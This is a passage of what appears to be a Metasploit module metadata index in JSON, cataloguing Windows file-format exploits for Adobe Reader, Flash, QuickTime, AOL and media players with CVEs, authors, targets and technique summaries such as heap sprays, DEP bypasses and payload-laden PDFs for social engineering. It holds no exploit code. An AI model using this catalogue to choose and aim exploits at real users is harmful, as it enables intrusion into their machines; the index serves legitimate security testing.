"description": "This module exploits a vulnerability in the handling of certain SWF movies\n within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat\n are also vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. This method is unlikely to work across various\n Windows versions due to a hardcoded syscall number.",
"references": [
"CVE-2010-3654",
"OSVDB-68932",
"BID-44504",
"URL-http://www.adobe.com/support/security/advisories/apsa10-05.html",
"URL-http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/",
"URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_flashplayer_button",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_flashplayer_newfunction": {
"name": "Adobe Flash Player \"newfunction\" Invalid Pointer Use",
"full_name": "exploit/windows/fileformat/adobe_flashplayer_newfunction",
"rank": 300,
"disclosure_date": "2010-06-04",
"type": "exploit",
"author": [
"Unknown",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the DoABC tag handling within\n versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\n vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. This method is unlikely to work across various\n Windows versions due to the hardcoded syscall number.",
"references": [
"CVE-2010-1297",
"OSVDB-65141",
"BID-40586",
"URL-http://www.adobe.com/support/security/advisories/apsa10-01.html",
"URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_flashplayer_newfunction",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_flatedecode_predictor02": {
"name": "Adobe FlateDecode Stream Predictor 02 Integer Overflow",
"full_name": "exploit/windows/fileformat/adobe_flatedecode_predictor02",
"rank": 400,
"disclosure_date": "2009-10-08",
"type": "exploit",
"author": [
"unknown",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits an integer overflow vulnerability in Adobe Reader and Adobe\n Acrobat Professional versions before 9.2.",
"references": [
"CVE-2009-3459",
"BID-36600",
"OSVDB-58729",
"URL-http://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html",
"URL-http://www.adobe.com/support/security/bulletins/apsb09-15.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader Windows Universal (JS Heap Spray)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_flatedecode_predictor02",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_geticon": {
"name": "Adobe Collab.getIcon() Buffer Overflow",
"full_name": "exploit/windows/fileformat/adobe_geticon",
"rank": 400,
"disclosure_date": "2009-03-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"Didier Stevens <didier.stevens@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\n crafted pdf that contains a malformed Collab.getIcon() call, an attacker may\n be able to execute arbitrary code.",
"references": [
"CVE-2009-0927",
"OSVDB-53647",
"ZDI-09-014"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader Universal (JS Heap Spray)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_geticon.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_geticon",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_illustrator_v14_eps": {
"name": "Adobe Illustrator CS4 v14.0.0",
"full_name": "exploit/windows/fileformat/adobe_illustrator_v14_eps",
"rank": 500,
"disclosure_date": "2009-12-03",
"type": "exploit",
"author": [
"pyrokinesis",
"dookie"
],
"description": "Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)\n overlong DSC Comment Buffer Overflow Exploit",
"references": [
"CVE-2009-4195",
"BID-37192",
"OSVDB-60632",
"EDB-10281"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_illustrator_v14_eps",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_jbig2decode": {
"name": "Adobe JBIG2Decode Memory Corruption",
"full_name": "exploit/windows/fileformat/adobe_jbig2decode",
"rank": 400,
"disclosure_date": "2009-02-19",
"type": "exploit",
"author": [
"natron <natron@metasploit.com>",
"xort",
"redsand",
"MC <mc@metasploit.com>",
"Didier Stevens <didier.stevens@gmail.com>"
],
"description": "This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.\n This module relies upon javascript for the heap spray.",
"references": [
"CVE-2009-0658",
"OSVDB-52073"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader v9.0.0 (Windows XP SP3 English)",
"Adobe Reader v8.1.2 (Windows XP SP2 English)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_jbig2decode.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_jbig2decode",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_libtiff": {
"name": "Adobe Acrobat Bundled LibTIFF Integer Overflow",
"full_name": "exploit/windows/fileformat/adobe_libtiff",
"rank": 400,
"disclosure_date": "2010-02-16",
"type": "exploit",
"author": [
"Microsoft",
"villy <villys777@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat\n Professional versions 8.0 through 8.2 and 9.0 through 9.3.",
"references": [
"CVE-2010-0188",
"BID-38195",
"OSVDB-62526",
"URL-http://www.adobe.com/support/security/bulletins/apsb10-07.html",
"URL-http://secunia.com/blog/76/",
"URL-http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_libtiff.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_libtiff",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_media_newplayer": {
"name": "Adobe Doc.media.newPlayer Use After Free Vulnerability",
"full_name": "exploit/windows/fileformat/adobe_media_newplayer",
"rank": 400,
"disclosure_date": "2009-12-14",
"type": "exploit",
"author": [
"unknown",
"hdm <x@hdm.io>",
"pusscat <pusscat@metasploit.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat\n Professional versions up to and including 9.2.",
"references": [
"CVE-2009-4324",
"BID-37331",
"OSVDB-60980"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader Windows English (JS Heap Spray)",
"Adobe Reader Windows German (JS Heap Spray)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_media_newplayer.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_media_newplayer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_pdf_embedded_exe": {
"name": "Adobe PDF Embedded EXE Social Engineering",
"full_name": "exploit/windows/fileformat/adobe_pdf_embedded_exe",
"rank": 600,
"disclosure_date": "2010-03-29",
"type": "exploit",
"author": [
"Colin Ames <amesc@attackresearch.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module embeds a Metasploit payload into an existing PDF file. The\n resulting PDF can be sent to a target as part of a social engineering attack.",
"references": [
"CVE-2010-1240",
"OSVDB-63667",
"URL-http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/",
"URL-http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/",
"URL-http://blog.didierstevens.com/2010/03/29/escape-from-pdf/",
"URL-http://www.adobe.com/support/security/bulletins/apsb10-15.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_pdf_embedded_exe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_pdf_embedded_exe_nojs": {
"name": "Adobe PDF Escape EXE Social Engineering (No JavaScript)",
"full_name": "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs",
"rank": 600,
"disclosure_date": "2010-03-29",
"type": "exploit",
"author": [
"Jeremy Conway <jeremy@sudosecure.net>"
],
"description": "This module embeds a Metasploit payload into an existing PDF file in\n a non-standard method. The resulting PDF can be sent to a target as\n part of a social engineering attack.",
"references": [
"CVE-2010-1240",
"OSVDB-63667",
"URL-http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/",
"URL-http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/",
"URL-http://blog.didierstevens.com/2010/03/29/escape-from-pdf/",
"URL-http://www.adobe.com/support/security/bulletins/apsb10-15.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader <= v9.3.3 (Windows XP SP3 English)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_pdf_embedded_exe_nojs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_reader_u3d": {
"name": "Adobe Reader U3D Memory Corruption Vulnerability",
"full_name": "exploit/windows/fileformat/adobe_reader_u3d",
"rank": 200,
"disclosure_date": "2011-12-06",
"type": "exploit",
"author": [
"Felipe Andres Manzano",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the U3D handling within\n versions 9.x through 9.4.6 and 10 through to 10.1.1 of Adobe Reader.\n The vulnerability is due to the use of uninitialized memory.\n\n Arbitrary code execution is achieved by embedding specially crafted U3D\n data into a PDF document. A heap spray via JavaScript is used in order to\n ensure that the memory used by the invalid pointer issue is controlled.",
"references": [
"CVE-2011-2462",
"OSVDB-77529",
"BID-50922",
"URL-http://www.adobe.com/support/security/advisories/apsa11-04.html",
"URL-http://blog.9bplus.com/analyzing-cve-2011-2462",
"URL-https://sites.google.com/site/felipeandresmanzano/PDFU3DExploitJS_CVE_2009_2990.py?attredirects=0",
"URL-http://contagiodump.blogspot.com/2011/12/adobe-zero-day-cve-2011-2462.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_reader_u3d.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_reader_u3d",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_toolbutton": {
"name": "Adobe Reader ToolButton Use After Free",
"full_name": "exploit/windows/fileformat/adobe_toolbutton",
"rank": 300,
"disclosure_date": "2013-08-08",
"type": "exploit",
"author": [
"Soroush Dalili",
"Unknown",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6\n and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where\n the cEnable callback can be used to free the object memory early. Later use of the object\n allows triggering the use after free condition. This module has been tested successfully\n on Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild in\n November, 2013.",
"references": [
"CVE-2013-3346",
"OSVDB-96745",
"ZDI-13-212",
"URL-http://www.adobe.com/support/security/bulletins/apsb13-15.html",
"URL-http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP / Adobe Reader 9/10/11"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_toolbutton.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_toolbutton",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_u3d_meshdecl": {
"name": "Adobe U3D CLODProgressiveMeshDeclaration Array Overrun",
"full_name": "exploit/windows/fileformat/adobe_u3d_meshdecl",
"rank": 400,
"disclosure_date": "2009-10-13",
"type": "exploit",
"author": [
"Felipe Andres Manzano <felipe.andres.manzano@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits an array overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.4, < 8.2, and < 9.3. By creating a\n specially crafted pdf that contains malformed U3D data, an attacker may\n be able to execute arbitrary code.",
"references": [
"CVE-2009-3953",
"OSVDB-61690",
"URL-http://www.adobe.com/support/security/bulletins/apsb10-02.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader Windows Universal (JS Heap Spray)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_u3d_meshdecl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_utilprintf": {
"name": "Adobe util.printf() Buffer Overflow",
"full_name": "exploit/windows/fileformat/adobe_utilprintf",
"rank": 400,
"disclosure_date": "2008-02-08",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"Didier Stevens <didier.stevens@gmail.com>"
],
"description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional\n < 8.1.3. By creating a specially crafted pdf that contains a malformed util.printf()\n entry, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-2992",
"OSVDB-49520"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader v8.1.2 (Windows XP SP3 English)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_utilprintf.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_utilprintf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/allplayer_m3u_bof": {
"name": "ALLPlayer M3U Buffer Overflow",
"full_name": "exploit/windows/fileformat/allplayer_m3u_bof",
"rank": 300,
"disclosure_date": "2013-10-09",
"type": "exploit",
"author": [
"metacom",
"Mike Czumak",
"Gabor Seljan"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n ALLPlayer 5.8.1, caused by a long string in a playlist entry.\n By persuading the victim to open a specially-crafted .M3U file, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows 7 SP1.",
"references": [
"CVE-2013-7409",
"BID-62926",
"BID-63896",
"EDB-28855",
"EDB-29549",
"EDB-29798",
"EDB-32041",
"OSVDB-98283",
"URL-http://www.allplayer.org/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
" ALLPlayer 2.8.1 / Windows 7 SP1"
],
"mod_time": "2018-07-09 13:22:08 +0000",
"path": "/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/allplayer_m3u_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/altap_salamander_pdb": {
"name": "Altap Salamander 2.5 PE Viewer Buffer Overflow",
"full_name": "exploit/windows/fileformat/altap_salamander_pdb",
"rank": 400,
"disclosure_date": "2007-06-19",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a buffer overflow in Altap Salamander <= v2.5.\n By creating a malicious file and convincing a user to view the file with\n the Portable Executable Viewer plugin within a vulnerable version of\n Salamander, the PDB file string is copied onto the stack and the\n SEH can be overwritten.",
"references": [
"CVE-2007-3314",
"BID-24557",
"OSVDB-37579",
"URL-http://vuln.sg/salamander25-en.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal Salamander 2.5"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/fileformat/altap_salamander_pdb.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/altap_salamander_pdb",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/aol_desktop_linktag": {
"name": "AOL Desktop 9.6 RTX Buffer Overflow",
"full_name": "exploit/windows/fileformat/aol_desktop_linktag",
"rank": 300,
"disclosure_date": "2011-01-31",
"type": "exploit",
"author": [
"sup3r",
"sickn3ss",
"sinn3r <sinn3r@metasploit.com>",
"mr_me <steventhomasseeley@gmail.com>",
"silent_dream"
],
"description": "This module exploits a vulnerability found in AOL Desktop 9.6's Tool\\rich.rct\n component. By supplying a long string of data in the hyperlink tag, rich.rct copies\n this data into a buffer using a strcpy function, which causes an overflow, and\n results in arbitrary code execution.",
"references": [
"OSVDB-70741",
"EDB-16085"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"AOL Desktop 9.6 on Windows XP SP3",
"AOL Desktop 9.6 on Windows XP SP3 - NX bypass",
"AOL Desktop 9.6 on Windows 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/aol_desktop_linktag.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/aol_desktop_linktag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/aol_phobos_bof": {
"name": "AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow",
"full_name": "exploit/windows/fileformat/aol_phobos_bof",
"rank": 200,
"disclosure_date": "2010-01-20",
"type": "exploit",
"author": [
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5.\n By setting an overly long value to 'Import()', an attacker can overrun a buffer\n and execute arbitrary code.\n\n NOTE: This ActiveX control is NOT marked safe for scripting or initialization.",
"references": [
"OSVDB-61964",
"EDB-11204",
"URL-http://www.rec-sec.com/2010/01/25/aol-playlist-class-buffer-overflow/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/aol_phobos_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/aol_phobos_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/apple_quicktime_pnsize": {
"name": "Apple QuickTime PICT PnSize Buffer Overflow",
"full_name": "exploit/windows/fileformat/apple_quicktime_pnsize",
"rank": 400,
"disclosure_date": "2011-08-08",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0.\n When opening a .mov file containing a specially crafted PnSize value, an attacker\n may be able to execute arbitrary code.",
"references": [
"CVE-2011-0257",
"OSVDB-74687",
"EDB-17777",
"BID-49144"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 with DEP bypass"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/apple_quicktime_pnsize",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/apple_quicktime_rdrf": {
"name": "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",
"full_name": "exploit/windows/fileformat/apple_quicktime_rdrf",
"rank": 300,
"disclosure_date": "2013-05-22",
"type": "exploit",
"author": [
"Jason Kratzer",
"Tom Gallagher",
"Paul Bates",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Apple QuickTime. The flaw is\n triggered when QuickTime fails to properly handle the data length for certain\n atoms such as 'rdrf' or 'dref' in the Alis record, which may result in a buffer\n overflow by loading a specially crafted .mov file, and allows arbitrary\n code execution under the context of the current user. Please note: Since an egghunter\n is used to search for the payload, this may require additional time for\n the exploit to complete.",
"references": [
"CVE-2013-1017",
"OSVDB-93625",
"BID-60097",
"URL-http://support.apple.com/kb/HT5770",
"ZDI-13-110"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Quicktime 7.7.0 - 7.7.3 on Windows XP SP3"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/apple_quicktime_rdrf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/apple_quicktime_texml": {
"name": "Apple QuickTime TeXML Style Element Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/apple_quicktime_texml",
"rank": 300,
"disclosure_date": "2012-05-15",
"type": "exploit",
"author": [
"Alexander Gavrun",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Apple QuickTime. When handling\n a TeXML file, it is possible to trigger a stack-based buffer overflow, and then\n gain arbitrary code execution under the context of the user. This is due to the\n QuickTime3GPP.gtx component not handling certain Style subfields properly, storing\n user-supplied data on the stack, which results in the overflow.",
"references": [
"OSVDB-81934",
"CVE-2012-0663",
"BID-53571",
"ZDI-12-107",
"URL-http://0x1byte.blogspot.com/2012/06/cve-2012-0663-and-cve-2012-0664-samples.html",
"URL-http://support.apple.com/kb/HT1222"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"QuickTime 7.7.1 on Windows XP SP3",
"QuickTime 7.7.0 on Windows XP SP3",
"QuickTime 7.6.9 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/apple_quicktime_texml.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/apple_quicktime_texml",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/audio_coder_m3u": {
"name": "AudioCoder .M3U Buffer Overflow",
"full_name": "exploit/windows/fileformat/audio_coder_m3u",
"rank": 300,
"disclosure_date": "2013-05-01",
"type": "exploit",
"author": [
"metacom",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow in AudioCoder 0.8.18. The vulnerability\n occurs when adding an .m3u, allowing arbitrary code execution with the privileges\n of the user running AudioCoder. This module has been tested successfully on\n AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2017-8870",
"OSVDB-92939",
"EDB-25141"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"AudioCoder 0.8.18.5353 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/fileformat/audio_coder_m3u.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/audio_coder_m3u",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/audio_wkstn_pls": {
"name": "Audio Workstation 6.4.2.4.3 pls Buffer Overflow",
"full_name": "exploit/windows/fileformat/audio_wkstn_pls",
"rank": 400,
"disclosure_date": "2009-12-08",
"type": "exploit",
"author": [
"germaya_x",
"dookie"
],
"description": "This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.\n When opening a malicious pls file with the Audio Workstation,\n a remote attacker could overflow a buffer and execute\n arbitrary code.",
"references": [
"CVE-2009-0476",
"OSVDB-55424",
"EDB-10353"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/audio_wkstn_pls.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/audio_wkstn_pls",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/audiotran_pls": {
"name": "Audiotran 1.4.1 (PLS File) Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/audiotran_pls",
"rank": 400,
"disclosure_date": "2010-01-09",
"type": "exploit",
"author": [
"Sebastien Duquette",
"dookie"
],
"description": "This module exploits a stack-based buffer overflow in Audiotran 1.4.1.\n An attacker must send the file to the victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a browser, when the PLS extension is registered to Audiotran.\n This functionality has not been tested in this module.",
"references": [
"CVE-2009-0476",
"OSVDB-55424",
"EDB-11079"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/audiotran_pls.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/audiotran_pls",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/audiotran_pls_1424": {
"name": "Audiotran PLS File Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/audiotran_pls_1424",
"rank": 400,
"disclosure_date": "2010-09-09",
"type": "exploit",
"author": [
"Philip OKeefe"
],
"description": "This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4.\n An attacker must send the file to the victim and the victim must open the file.\n Alternatively, it may be possible to execute code remotely via an embedded\n PLS file within a browser when the PLS extension is registered to Audiotran.\n This alternate vector has not been tested and cannot be exercised directly\n with this module.",
"references": [
"EDB-14961"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/audiotran_pls_1424.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/audiotran_pls_1424",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/aviosoft_plf_buf": {
"name": "Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/aviosoft_plf_buf",
"rank": 400,
"disclosure_date": "2011-11-09",
"type": "exploit",
"author": [
"modpr0be",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Aviosoft Digital TV Player\n Pro version 1.x. An overflow occurs when the process copies the content of a\n playlist file on to the stack, which may result in arbitrary code execution under\n the context of the user.",
"references": [
"OSVDB-77043",
"EDB-18096"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Aviosoft DTV Player 1.0.1.2"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb",
